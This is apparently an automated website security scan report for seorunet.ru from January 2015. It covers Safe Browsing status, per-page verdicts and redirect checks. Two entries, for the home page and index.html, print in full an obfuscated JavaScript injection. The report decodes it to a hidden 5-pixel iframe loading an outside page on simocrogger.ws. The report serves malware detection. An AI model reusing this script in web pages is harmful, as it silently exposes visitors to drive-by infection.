Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=seorunet.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://seorunet.ru/ | 200 OK Content-Length: 10781 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';
s+='060073070082065077069032115114099061034104116116112058047047115105109111099114111103103101114046119'; s=s+'115047102108097115104047105110100101120046112104112034032119105100116104061053032104101105103104116'; s=s+'061053032115116121108101061034100105115112108097121058110111110101034062060047073070082065077069062'; s=s+'032'; t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp(); Decoded script: </textatea></textarea><IFRAME src="http://simocrogger.ws/flash/index.php" width=5 height=5 style="display:none"></IFRAME> Antivirus reports:
| ||
http://seorunet.ru/index.html | 200 OK Content-Length: 10781 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';
s+='060073070082065077069032115114099061034104116116112058047047115105109111099114111103103101114046119'; s=s+'115047102108097115104047105110100101120046112104112034032119105100116104061053032104101105103104116'; s=s+'061053032115116121108101061034100105115112108097121058110111110101034062060047073070082065077069062'; s=s+'032'; t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp(); Decoded script: </textatea></textarea><IFRAME src="http://simocrogger.ws/flash/index.php" width=5 height=5 style="display:none"></IFRAME> Antivirus reports:
| ||
http://seorunet.ru/about.html | 200 OK Content-Length: 10087 Content-Type: text/html | clean |
http://seorunet.ru/benefits.html | 200 OK Content-Length: 10143 Content-Type: text/html | clean |
http://seorunet.ru/price.html | 200 OK Content-Length: 9947 Content-Type: text/html | clean |
http://seorunet.ru/article.html | 200 OK Content-Length: 9435 Content-Type: text/html | clean |
http://seorunet.ru/contact.html | 200 OK Content-Length: 9485 Content-Type: text/html | clean |
http://seorunet.ru/test404page.js | HTTP/1.1 302 Found Connection: close Date: Tue, 13 Jan 2015 10:11:25 GMT Location: http://err.agava.ru/vh/404.html Server: nginx Content-Type: text/html; charset=iso-8859-1 | clean |
http://err.agava.ru/vh/404.html | 200 OK Content-Length: 12338 Content-Type: text/html | clean |
http://err.agava.ru/vh/js/main.js | 200 OK Content-Length: 34164 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: seorunet.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 13 Jan 2015 10:11:24 GMT
Accept-Ranges: bytes
ETag: "8c9882-2a1d-469ddfde"
Server: nginx
Content-Length: 10781
Content-Type: text/html
Last-Modified: Wed, 18 Jul 2007 09:39:42 GMT
...10781 bytes of data.
GET / HTTP/1.1
Host: seorunet.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 13 Jan 2015 10:11:24 GMT
Accept-Ranges: bytes
ETag: "8c9882-2a1d-469ddfde"
Server: nginx
Content-Length: 10781
Content-Type: text/html
Last-Modified: Wed, 18 Jul 2007 09:39:42 GMT
...10781 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: seorunet.ru
Referer: http://www.google.com/search?q=seorunet.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: seorunet.ru
Referer: http://www.google.com/search?q=seorunet.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.